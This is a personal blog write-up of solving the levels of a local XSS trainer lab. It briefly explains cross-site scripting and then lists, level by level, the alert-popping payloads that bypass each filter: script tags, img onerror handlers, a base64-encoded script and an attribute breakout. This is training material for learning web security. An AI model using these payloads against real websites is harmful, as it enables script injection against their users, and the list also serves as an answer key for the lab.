Hey there!! It’s me back again with the new blog. Today in this blog, I’m going to share with you some interesting stuff. In this write-up, I am going to tell you how I performed the XSS vulnerability challenges on the Linux machine while having some free time.
Before heading to the task, firstly we should have to gain or have good knowledge of “Cross Site Scripting,” as we are using “Cross Site Scripting,” attacks to perform these challenges.
Cross-site scripting (XSS) assaults are injection attacks in which malicious scripts are inserted into otherwise trustworthy and innocent websites. XSS attacks occur when an attacker utilizes a web application to transmit malicious code to a separate end user, usually in the form of a browser-side script. The flaws that allow these attacks to succeed are common and can be found whenever a web application accepts user input in its output without verifying or encoding it.
The Commence:
For this lab, I am going to work on the XSS trainer lab. Before visiting through challenges at first I am going to up docker-compose.
In this xss trainer lab, I have a set of challenge style levels. So, starting with level 0
1. Level 0: Tutorial
Vulnerable Input: <script>alert(“trigger”)</script>
2. Level 1: No filter
Example User Input: <script>alert(“trigger”)</script>
3. Level 2: Client Side Filter
Example User Input: <script>alert(‘trigger’)</script>
Using the analyze element tool, change the type of entry box from “email” to “text” at this level.
4. Level 3: Simple Replace
Vulnerable Input: <img src = “#” onerror = alert(“Warn”)>
5. Level 4: Basic Regexp
Vulnerable Input : <img src = “#” onerror = alert(“Warn”)>
6. Level 5: Basic preg_replace
Vulnerable Input: b” <img src = ‘#’ onerror = alert(1)>”
7. Level 6: Script tag Filter
Vulnerable Input: <img src = ‘#’ onerror = alert(1)>
8. Level 7: Escape Characters
Example User Input: <img src = \\’#\\’ onerror = alert(1)></img>
9. Level 8: Encoding
Vulnerable Input: <script> alert (‘1’) </script>
Encoded form (payload): PHNjcmlwdD4gYWxlcnQgKCcxJykgPC9zY3JpcHQ+
10. Level 9: Tag Attributes
Message: 1
Attribute: “><script>alert(1)</script>>
11. Level 10: More Tag Attributes
Final Reflections:
Performing cross-site scripting challenges was a great experience. Cross-site scripting (XSS) assaults are injection attacks in which malicious scripts are inserted into otherwise trustworthy and innocent websites. XSS attacks occur when an attacker utilizes a web application to transmit malicious code to a separate end user, usually in the form of a browser-side script. I hope you enjoyed it and learned new techniques.
That’s all for this blog, I hope you guys enjoyed this form of learning. ❤
Till then keep learning, keep exploring, and do hacking………………………
You can follow me on Social Media:
Linkedin: https://www.linkedin.com/in/rohit-ray-19284b232/
GitHub: https://github.com/rohit273
Twitter: https://twitter.com/RHittttt
Instagram: https://www.instagram.com/ro_hit.exe/
Please follow and subscribe for more awesome upcoming blogs.
Bye until Next time.
